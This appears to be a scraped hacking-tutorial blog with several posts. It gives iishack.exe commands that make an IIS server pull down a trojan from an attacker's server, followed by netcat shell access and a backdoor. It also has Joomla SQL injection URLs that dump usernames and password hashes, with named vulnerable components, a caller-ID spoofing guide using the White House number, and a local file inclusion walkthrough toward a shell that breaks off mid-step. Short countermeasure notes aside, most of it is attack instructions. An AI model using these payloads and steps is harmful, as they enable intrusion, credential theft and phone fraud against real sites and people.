<div dir="ltr" style="text-align: left;" trbidi="on"> <br /> <div class="separator"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe8Wsar8QnZKYzupW_QVFoFesAX_3SJrnOV2P3aV2ddmnmFtUCz5F4OUss3bwN7yBz0X6AhLLsmEBs2Ag_qBc43PegiUfPK4BesbYHE9oWQ5xGBlTE73t8cEAh6DMJBOSf1Oh1Or7X1eQ9/s1600/Server-Hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe8Wsar8QnZKYzupW_QVFoFesAX_3SJrnOV2P3aV2ddmnmFtUCz5F4OUss3bwN7yBz0X6AhLLsmEBs2Ag_qBc43PegiUfPK4BesbYHE9oWQ5xGBlTE73t8cEAh6DMJBOSf1Oh1Or7X1eQ9/s320/Server-Hacking.jpg" width="320" /></a></div> <br /> The popular web servers are Apache Web Server, Internet Information Server and Sun ONE Web Server.<br /> The Apache Web Server is an open-source web server for modern operating systems including UNIX and Windows NT. The server provides HTTP services in sync with the current HTTP standards in an efficient and extensible environment.<br /> <br /> The Java Web Server / Sun ONE Web Server is one of the other highly available Web servers on the market. Microsoft's Internet Information Server is another popular server used by a sizable percentage of websites.<br /> <table border="0" cellpadding="0" cellspacing="0" class="note"><tbody> <tr><td class="admon-check" valign="top"></td><td class="admon-title" valign="top" width="56"><br /> Threat</td><td class="admon-body" valign="top"><br /> <b class="bold">Common Security Risks</b><br /> <br /> Let us take a look at some of the security concerns that arise in the context of web servers. There are inherent security risks that affect web servers, the local area networks that host these web sites, and perhaps even the normal users of web browsers.</td></tr> </tbody></table> <br /> <div class="section" style="margin: 0px 27px; padding: 0px;"> <h4> Webmaster's Concern</h4> <br /> From a webmaster's perspective, the biggest security concern is that the web server can expose the local are network or the corporate intranet to the threats posed by the Internet. This may be in the form of virus, Trojans, hackers or compromise of information itself. It is often considered that software bugs present in large complex programs are the source of imminent security lapses. Web servers, being large complex devices do come with these inherent risks. Apart from this, the open architecture of some Web servers allows arbitrary scripts to be executed on the server's side of the connection in response to remote requests. Any CGI script installed at the site may contain bugs that are potential security holes.</div> <br /> <div class="section" style="margin: 0px 27px; padding: 0px;"> <h4> Network Administrator's Concern</h4> <div class="first-para"> From a network administrator's perspective, a poorly configured web server poses another potential hole in the local network's security. While the objective of a web site is to provide controlled access to the network, too much of control can make a Web site impossible to use. In an intranet environment, the network administrator has to careful about configuring the web server such that legitimate users are recognized and authenticated and various groups of users assigned distinct access privileges.</div> </div> <div class="section" style="margin: 0px 27px; padding: 0px;"> <h4> End User's Concern</h4> <div class="first-para"> Usually the end user does not perceive any immediate threat, as surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, makes it possible for harmful applications such as viruses to invade the user's system. Besides, active content from a web browser can be a conduit for malicious software to bypass the firewall system and permeate the local area network.</div> <div class="last-para"> The threat for the end user stems from the fact that the TCP/IP protocol was not designed with security as its foremost priority. Therefore, data can be compromised in terms of confidentiality, authentication, and integrity as it is transmitted across the Web. In essence the aspects of confidentiality, authentication, and integrity need to be guarded both on the client side and server side to the extent possible.</div> </div> <div class="section" style="margin: 0px 27px; padding: 0px;"> <h4> Risks</h4> <div class="first-para"> There are basically three overlapping types of risk:</div> <ol class="orderedlist"> <li class="first-listitem" style="margin: 0px 0px 0.25em; padding: 0px; text-indent: 0px;"> <div class="first-para"> Bugs /misconfiguration problems in the Web server that allow unauthorized remote users to:</div> <ul class="itemizedlist" style="line-height: 1.4; list-style-type: disc; margin: 0.5em 0px; padding: 0px 2.5em;"> <li class="first-listitem" style="border-bottom: 1px none transparent; border-style: none; color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> Steal classified information.</div> </li> <li class="listitem" style="border-bottom: 1px none transparent; border-style: none; border-top: 1px none rgb(238, 238, 238); color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> Execute commands on the server host machine and modifying the system.</div> </li> <li class="listitem" style="border-bottom: 1px none transparent; border-style: none; border-top: 1px none rgb(238, 238, 238); color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> Retrieve host based information to assist them in compromising the system.</div> </li> <li class="listitem" style="border-style: none; border-top: 1px none rgb(238, 238, 238); color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> Launch denial-of-service attacks, rendering the machine temporarily unusable.</div> </li> </ul> </li> <li class="listitem" style="margin: 0px 0px 0.25em; padding: 0px; text-indent: 0px;"> <div class="first-para"> Browser-side risks</div> <ul class="itemizedlist" style="line-height: 1.4; list-style-type: disc; margin: 0.5em 0px; padding: 0px 2.5em;"> <li class="first-listitem" style="border-bottom: 1px none transparent; border-style: none; color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> Active content that crashes the browser, damages the user's system, breaches the user's privacy, or merely creates a disturbance.</div> </li> <li class="listitem" style="border-style: none; border-top: 1px none rgb(238, 238, 238); color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> The misuse of personal information provided by the end-user.</div> </li> </ul> </li> <li class="listitem" style="margin: 0px 0px 0.25em; padding: 0px; text-indent: 0px;"> <div class="first-para"> Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server including:</div> <ul class="itemizedlist" style="line-height: 1.4; list-style-type: disc; margin: 0.5em 0px; padding: 0px 2.5em;"> <li class="first-listitem" style="border-bottom: 1px none transparent; border-style: none; color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> The network on the browser's side of the connection.</div> </li> <li class="listitem" style="border-bottom: 1px none transparent; border-style: none; border-top: 1px none rgb(238, 238, 238); color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> The network on the server's side of the connection (including intranets).</div> </li> <li class="listitem" style="border-bottom: 1px none transparent; border-style: none; border-top: 1px none rgb(238, 238, 238); color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> The end-user's Internet service provider (ISP).</div> </li> <li class="listitem" style="border-style: none; border-top: 1px none rgb(238, 238, 238); color: #444444; margin: 0px 0px 0.25em; padding: 0.25em 0px; text-indent: 0px;"> <div class="first-para"> The server's ISP or regional access provider.</div> </li> </ul> </li> </ol> </div> </div>

Hacking Risks Server Vulnerability Popular Web Servers : Hacking Web Servers

The popular web servers are Apache Web Server, Internet Information Server and Sun ONE Web Server. The Apache Web Server is an open-so...

Read more »

Hacking IIS

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGWnj39bEwTIgiQpguaTS_CyfOb3JAtltv0JJa1j86ltv5w7N709cxJx4P1uyMQ1IhKF71aLeaenb4HHIWOfHY_Gb3ChoRymhOdVWrvEJzS7GDR_7JrGwPo7qemdU9LcRN97Dyy9oclT1k/s1600/unledusi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGWnj39bEwTIgiQpguaTS_CyfOb3JAtltv0JJa1j86ltv5w7N709cxJx4P1uyMQ1IhKF71aLeaenb4HHIWOfHY_Gb3ChoRymhOdVWrvEJzS7GDR_7JrGwPo7qemdU9LcRN97Dyy9oclT1k/s640/unledusi.jpg" width="640" /></a></div> <center> <b>Hacking Tool: IISHack.exe</b></center> <div class="highlight"> iishack.exe </div> overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.<br /> <div class="command wobble-horizontal"> iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe </div> <br /> <br /> <div class="highlight"> www.yourtarget.com </div> is the IIS server you're hacking, <br /> <div class="highlight"> 80 </div> is the port its listening on, <br /> <div class="highlight"> www.yourserver.com </div> is some webserver with your trojan or custom script (your own, or another), and <br /> <div class="highlight"> /thetrojan.exe </div> is the path to that script.<br /> "<br /> <div class="system pop"> IIS Hack </div> " is a buffer overflow vulnerability exposed by the way IIS handles requests with <br /> <div class="highlight"> .HTR </div> extensions. A hacker sends a long URL that ends with "<br /> <div class="system pop"> .HTR </div> ". IIS interprets it as a file type of HTR and invokes the <br /> <div class="system pop"> ISM.DLL </div> to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.<br /> <br /> A sample exploit can be constructed as shown below:<br /> <br /> To hack the target site and attacker's system running a web server can use <br /> <div class="highlight"> iishack.exe </div> and <br /> <div class="highlight"> ncx.exe </div> .<br /> <br /> To begin with, the <br /> <div class="system pop"> ncx.exe </div> is configured to run from the root directory. IIShack.exe is then run against the victim site.<br /> <div class="command wobble-horizontal"> c:\>iishack.exe  80 /ncx.exe</div> <br /> <br /> The attacker can then use netcat to evoke the command shell. <br /> <br /> <div class="command wobble-horizontal"> c:\>nc  80</div> <br /> <br /> He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.<br /> <br /> <h3> IPP Buffer Overflow Countermeasures</h3> <br /> <ol> <li>Install latest service pack from Microsoft.</li> <li>Remove IPP printing from IIS Server</li> <li>Install firewall and remove unused extensions</li> <li>Implement aggressive network egress filtering</li> <li>Use IISLockdown and URLScan utilities</li> <li>Regularly scan your network for vulnerable servers</li> </ol> Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes.<br /> As with many <br /> <div class="highlight"> IIS vulnerabilities</div> , the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in <br /> <div class="system pop"> C: \WINNT\System32\msw3prt.dll</div> and provides <br /> <div class="highlight"> Windows 2000 </div> with support for the IPP. If this functionality is not required on the Web server, the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited. This is possible because the DLL will not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasure to be adopted when securing IIS.<br /> <br /> Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress can help to a certain degree. With IIS, using <br /> <div class="highlight"> IISLockdown </div> and <br /> <div class="highlight"> URLScan </div> - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.<br /> Microsoft has also released a patch for the buffer overflow, but removing the <br /> <div class="system pop"> ISAPI DLL </div> is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.<br /> <br /> <h3> ISAPI DLL Source disclosures</h3> <br /> Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible. This is done by appending "<br /> <div class="highlight"> +.htr </div> " to a request for a known .asp (or .asa, .ini, etc) file. appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.<br /> IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords. HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions. HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.<br /> <br /> <h3 style="border: none;"> Attack Methods</h3> <br /> <h3> Exploit / Attack Methodology</h3> By making a specially formed request to IIS, with the name of the file and then appending around <br /> <div class="highlight"> 230 + " %20 " </div> (these represents spaces) and then appending "<br /> <div class="highlight"> .htr </div> " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.<br /> ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.<br /> "Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.<br /> If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.<br /> The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.<br /> ".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.<br /> The <br /> <div class="system pop"> .htr vulnerability </div> will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.<br /> <div class="highlight"> Absent Directory Browser Argument vulnerability</div> :<br /> Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.</div>

Hacking Hacking Tutorials IIS Server Tutorials Vulnerability Windows Server Hacking IIS

Hacking Tool: IISHack.exe iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed. iisha...

Read more »

Joomla SQL Injection

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicAAa0HONNRv5Te0qHhRmSuQGnG9SAShrUX3eEOHb84FPR_wqvv-MrPJUrEHU5e5-XQv2ONahPu6qv3N-TcCdwIPF1uWxud2jbr5cGtJf68YfwkwMDfZtBPt5ctTUIojJlndJBWWCYtSkG/s1600/joomla+sqli.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Hack Joomla Websites" border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicAAa0HONNRv5Te0qHhRmSuQGnG9SAShrUX3eEOHb84FPR_wqvv-MrPJUrEHU5e5-XQv2ONahPu6qv3N-TcCdwIPF1uWxud2jbr5cGtJf68YfwkwMDfZtBPt5ctTUIojJlndJBWWCYtSkG/s320/joomla+sqli.gif" title="Joomla SQL Injection" width="320" /></a></div> The probably most common case for <br /> <div class="highlight"> hacked Joomla websites </div> is that a SQL injection vulnerability was exploited. A typical URL which is affected by this type of vulnerability looks like this:<br /> <br /> <div class="program glow"> <pre><code class="prettyprint">index.php?option=com_blabla&category=5&Item=2</code></pre> </div> <br /> Typically the following parameters are vulnerable:<br /> <div class="content shadow-radial"> - cat, category, kat, categories, kats, cats<br /> - id, userid, katid, catid<br /> - sometimes also Item, entry, page </div> <br /> <br /> You can find out if a parameter is vulnerable when you change its value from e.g. <br /> <div class="system pop"> category=5 to category='</div> .<br /> <br /> Press enter and look for <br /> <div class="system glow"> MySQL errors </div> in the website. If you find one, you might have discovered a SQL inkjection vulnerability.<br /> <br /> In order to give you a better understanding and feeling of how vulnerable URLs might look like, I just show you some URLs which are known to be vulnerable (I discovered them):<br /> <br /> <div class="content shadow-radial" style="display: block;"> <div class="highlight"> URL: </div> index.php?option=com_jp_jobs&view=detail&id=1<br /> <div class="highlight"> Vulnerable parameter: </div> id</div> <br /> <div class="content shadow-radial" style="display: block;"> <div class="highlight"> URL: </div> index.php?option=com_mv_restaurantmenumanager&task=menu_display\Venue=XX&mid=XX&Itemid=XX<br /> <div class="highlight"> Vulnerable parameter: </div> mid</div> <br /> <div class="content shadow-radial" style="display: block;"> <div class="highlight"> URL: </div> index.php?option=com_qpersonel&task=qpListele&katid=2<br /> <div class="highlight"> Vulnerable parameter: </div> katid</div> <br /> <div class="content shadow-radial" style="display: block;"> <div class="highlight"> URL: </div> index.php?com_pandafminigames&Itemid=&task=myscores&userid=2<br /> <div class="highlight"> Vulnerable parameter: </div> userid</div> <br /> <div class="content shadow-radial" style="display: block;"> <div class="highlight"> URL: </div> index.php?option=com_joltcard&Itemid=21&task=view&cardID=6<br /> <div class="highlight"> Vulnerable parameter: </div> cardID</div> <br /> <div class="content shadow-radial" style="display: block;"> <div class="highlight"> URL: </div> index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62<br /> <div class="highlight"> Vulnerable parameter: </div> catid</div> <br /> <div class="content shadow-radial" style="display: block;"> <div class="highlight"> URL: </div> index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79<br /> <div class="highlight"> Vulnerable parameter: </div> id</div> <br /> <div class="content shadow-radial" style="display: block;"> <div class="highlight"> URL: </div> index.php?option=com_nkc&view=insc&lang=en&gp=10<br /> <div class="highlight"> Vulnerable parameter: </div> gp</div> Notice how many parameters look familiar to you? Yes, I mentioned them earlier as well-known parameters which are affected on regular basis :)<br /> <br /> Since every Joomla database contains the same structure (like the same tables etc.), we know enough to inject a SQL statement:<br /> <br /> <h3> Example #1:</h3> <div class="content shadow-radial" style="display: block;"> index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\username, password)--</div> <br /> <h3> Example #2:</h3> <div class="content shadow-radial" style="display: block;"> index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\8,9,10,11,12--</div> <br /> <h3> Example #3:</h3> <div class="content shadow-radial" style="display: block;"> index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\group_concat(0x503077337220743020743368206330777321,name,username,\password,email,usertype,0x503077337220743020743368206330777321)--</div> <br /> The selected information will be shown within the website.<br /> Select a username and password from the table and try to crack the MD5 hash with the help of raindbow tables.<br /> <br /> SQL injections in Joomla give us so much freedom as we can get. You can select everything you want from the database, and if you are lucky, there are also other tables in the databases which do not belong to Joomla but still contain some very interesting information.</div>

Hacking Hacking Tutorials Joomla SQL Injection Tutorials Joomla SQL Injection

The probably most common case for hacked Joomla websites is that a SQL injection vulnerability was exploited. A typical URL which is a...

Read more »

Joomla Component Vulnerability

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmM9xSP-E_97i_PPOh_6dYJ6cXuYv-kVIVJg60Fawvcda0cSqRtquyi87-sByBm1z124kMzXWuAgoTIeVteLplzcDDZn8gt2jiaFzTO4AAf4H2MbCEm3Z3LFh5Kb3Vaeb_Otqg6t9Gje6s/s1600/joomla+exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Joomla (com_question) SQL Injection Vulnerability" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmM9xSP-E_97i_PPOh_6dYJ6cXuYv-kVIVJg60Fawvcda0cSqRtquyi87-sByBm1z124kMzXWuAgoTIeVteLplzcDDZn8gt2jiaFzTO4AAf4H2MbCEm3Z3LFh5Kb3Vaeb_Otqg6t9Gje6s/s1600/joomla+exploit.png" title="Joomla (com_question) SQL Injection Vulnerability" /></a></div> <br /> <div class="post-body entry-content" style="line-height: 1.4; position: relative;"> <br /> <br /> <span class="Apple-style-span" style="font-family: monospace; font-size: 14px;">###################################################<br /> # |Title : Joomla (com_question) SQL Injection Vulnerability<br /> # |Vendor : <a href="http://www.alex-ensdorf.de/">http://www.alex-ensdorf.de/</a><br /> # |Version : Joomla 1.5<br /> # |Date : 15/5/2011<br /> # |Author : NeX HaCkEr<br /> # |Contact : <a href="mailto:Error_log@hotmail.com">Error_log@hotmail.com</a><br /> ##################################################<br /> # | Exploit :<br /> # | <a href="http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]">http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]</a><br /> # | <a href="http://localhost/Joomla/index.php/?option=com_question&catID=21">http://localhost/Joomla/index.php/?option=com_question&catID=21</a>' and+1=0 union all<br /> # | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20<br /> ##################################################<br /> # | Demo:<br /> # | <a href="http://site.com/index.php/?option=com_question&catID=21">http://site.com/index.php/?option=com_question&catID=21</a>' and+1=0 union all select # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20<br /> ##################################################<br /> # | Greetz :<br /> # | Dr.KAsBeR & DaShEr & MaFiA & WeeD<br /> ##################################################<br /> </span><br /> <br /></div> </div>

Hacking Joomla SQL Injection Vulnerability Joomla Component Vulnerability

################################################### # |Title : Joomla (com_question) SQL Injection Vulnerability # |Vendor : http:/...

Read more »

VoIP Hacks: How to Spoof Your Caller ID

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZUsI24P4Q03_WOqsfqLVkG2OujdHf2zKziY-PXPlMYHAeaa1vB_xEO3ON1vlDofYkZiOpC-wkHKnUp4h_7NsjFbuz1rXANKJdFERxIe0Yj7826Oqg15QhuyKzow5VdMfqWHSjJTUWcwE/s1600/voip-hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="How to Spoof Your Caller ID" border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZUsI24P4Q03_WOqsfqLVkG2OujdHf2zKziY-PXPlMYHAeaa1vB_xEO3ON1vlDofYkZiOpC-wkHKnUp4h_7NsjFbuz1rXANKJdFERxIe0Yj7826Oqg15QhuyKzow5VdMfqWHSjJTUWcwE/s1600/voip-hacked.jpg" title="Caller ID Spoofing" width="320" /></a></div> <br /> A fun prank is to call friends, family, or strangers from the White House's phone number (202 456-2121). The reason that this is possible is that Vonage, Skype, and other VoIP providers fundamentally must be able to fake caller ID in order to route calls from the internet onto public phone networks (so presumably they've been doing some lobbying over the years).<br /> <b style="margin: 0px; padding: 0px;">A Brief Technical Overview of Caller ID Spoofing:</b><br /> What we'll do is register a free account at an ITSP, or Internet Telephony Service Provider, which acts as the bridge between the internet and the public American (or otherwise) analog telephony networks. We'll then configure the ITSP to use the White House's phone number as our outbound caller ID. Finally, we'll connect to the ITSP using a free VoIP client, or softphone, to make our call using a PC.<br /> <div style="margin: 0px 0px 1.571em; padding: 0px;"> <b style="margin: 0px; padding: 0px;">The 10-Minute Step-by-Step Process:</b></div> <ol style="margin: 0px 0px 1.571em 1.571em; padding: 0px;"> <li style="margin: 0px; padding: 0px;"> Register a free account on <a href="http://www.sipgate.com/" style="color: #2361a1; margin: 0px; padding: 0px; text-decoration: underline;">SIPGate.com.</a></li> <li style="margin: 0px; padding: 0px;">Download <a href="http://www.counterpath.com/x-lite.html" style="color: #2361a1; margin: 0px; padding: 0px; text-decoration: underline;">X-Lite</a>, a free VoIP client.</li> <li style="margin: 0px; padding: 0px;">Log in to SIPGate, then go to Settings–>Caller ID.</li> <li style="margin: 0px; padding: 0px;">Enter 202-456-2121 as the Caller ID and click "Save."</li> <li style="margin: 0px; padding: 0px;">Go back to your SIPGate Settings screen and click "SIP Credentials."</li> <li style="margin: 0px; padding: 0px;">Leave that window alone for a moment.</li> <li style="margin: 0px; padding: 0px;"> Open X-Lite and go to Menu–>SIP Account Settings–>Add.</li> <li style="margin: 0px; padding: 0px;"> Use <a href="http://www.sipgate.com/faq/article/397/How_do_I_set_up_my_VoIP_device" style="color: #2361a1; margin: 0px; padding: 0px; text-decoration: underline;">these instructions</a> to configure your SIP Account Settings on X-Lite using your SIP Credentials.</li> <li style="margin: 0px; padding: 0px;">Dial any number and enjoy!</li> </ol> <br /><br /></div>

Asterisk Hacking Hacking Tutorials Linux OS Tutorials VoIP VoIP Hacks: How to Spoof Your Caller ID

A fun prank is to call friends, family, or strangers from the White House's phone number (202 456-2121). The reason that this is pos...

Read more »

Shell by LFI - Method proc / self / environ

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMjbYwWDfqkxa_gTF83wYEqKY1l2bwgA136U7N3JiX01cXuy-cyHYcqmXKZLHkJnrg0JbvVXqxhCZ0pkVaZM5qjDYC-u80FWy1lM3AiC4rQs_mjyr6qtYnhAPyT4bbWVPxRqLmuUT-xNh-/s1600/lfi+shell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMjbYwWDfqkxa_gTF83wYEqKY1l2bwgA136U7N3JiX01cXuy-cyHYcqmXKZLHkJnrg0JbvVXqxhCZ0pkVaZM5qjDYC-u80FWy1lM3AiC4rQs_mjyr6qtYnhAPyT4bbWVPxRqLmuUT-xNh-/s320/lfi+shell.jpg" width="320" /></a></div> <br /> <div class="para"> 1 - Introduction<br /> 2 - Discovery LFI<br /> 3 - check if / proc / self / environ is accessible<br /> 4 - malicious code injection<br /> 5 - Access to the shell<br /> 6 - Thanks<br /> <br /> <h3> >> 1 - Introduction</h3> <br /> In this tutorial I will show how to obtain a shell on a site using your Local File Inclusion and<br /> injecting malicious code in proc / self / environ.Este a tutorial that explains everything step by step.<br /> <br /> <h3> >> 2 - Discovery LFI</h3> <br /> - Now a site to find a vulnerable target to Local File <a href="http://inclusion.am/&t=ANT-2vyV6xI0BQ6QZt6MCFMkk1WGnFzI3BVF6BHPOhTLLepkcou6qJpV89btnA5JBcIcq4CgFTjFWubyjMexdr4Egu0z4qwcLwAAAAAAAAAA" style="color: #02679c; text-decoration: none;" target="_blank">Inclusion.Am</a> found to verify<br /> <br /> <a href="http://www.website.com/view.php?page%3Dcontact.php&amp" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=contact.php</a><br /> <br /> - Now to replace contact.php with .. / and the URL will become<br /> <br /> <a href="http://www.website.com/view.php?page%3D../" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../</a><br /> <br /> and have an error.<br /> <br /> Warning: include (../) [function.include]: failed to open stream: No such file or directory in / home / sirgod / public_html / <a href="http://website.com/" style="color: #02679c; text-decoration: none;" target="_blank">website.com</a> / view.php on line 1337 good chance to have a vulnerability type Local File <a href="http://inclusion.sa/" style="color: #02679c; text-decoration: none;" target="_blank">Inclusion.Sa</a> move on.</div> <br /> <div class="listitem"> - Check if we can access the <br /> <div class="highlight"> etc/passwd </div> to see if it is vulnerable to Local File <a href="http://inclusion.sa/" style="color: #02679c; text-decoration: none;" target="_blank">Inclusion.Sa</a>make a request:<br /> <br /> <a href="http://www.website.com/view.php?page%3D../../../etc/passwd" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../../../etc/passwd</a><br /> <br /> have an error and the file etc / passwd is not included.<br /> <br /> Warning: include (../) [function.include]: failed to open stream: No such file or directory in / home / sirgod / public_html / <a href="http://website.com/" style="color: #02679c; text-decoration: none;" target="_blank">website.com</a> / view.php on line 1337 climbed some directors<br /> <br /> <a href="http://www.website.com/view.php?page%3D../../../../../etc/passwd" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../../../../../etc/passwd</a><br /> <br /> We successfully included file etc / passwd.<br /> <div class="content shadow-radial"> root: x: 0:0: root: / root: / bin / bash bin: x: 1:1: bin: / bin: / sbin / Nologin daemon: x: 2:2: daemon: / sbin: / sbin / Nologin adm: x: 3:4: adm: / var / adm: / sbin / Nologin<br /> <br /> lp: x: 4:7: lp: / var / spool / lpd: / sbin / Nologin sync: x: 5:0: sync: / sbin: / bin / sync shutdown: x: 6:0: shutdown: / sbin : / sbin / shutdown halt: x: 7:0: halt: / sbin: / sbin / halt<br /> <br /> mail: x: 8:12: mail: / var / spool / mail: / sbin / Nologin news: x: 9:13: news: / etc / news: UUCP: x: 10:14: UUCP: / var / spool / UUCP: / sbin / Nologin<br /> <br /> operator: x: 11:0: operator: / root: / sbin / Nologin games: x: 12:100: games: / usr / games: / sbin / Nologin test: x: 13:30: test: / var / test : / sbin / Nologin ftp:x:14:50:FTP<br /> User: / var / ftp: / sbin / Nologin nobody: x: 99:99: Nobody: /: / sbin / Nologin</div> </div> <br /> <h3> >> 3 - check if / proc / self / environ is accessible</h3> <br /> - Now to see if / proc / self / environ is accesibil.O to replace etc / passwd with / proc / self / environ<br /> <br /> <a href="http://www.website.com/view.php?page%3D../../../" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../../../</a> ... LF / environ<br /> <br /> If you get something like<br /> <div class="content shadow-radial"> DOCUMENT_ROOT = / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml, q = 0.9, application / xhtml + xml, image / png,<br /> <br /> image / jpeg, image / gif, image / x-xbitmap, * / *, q = 0.1 PHPSESSID = 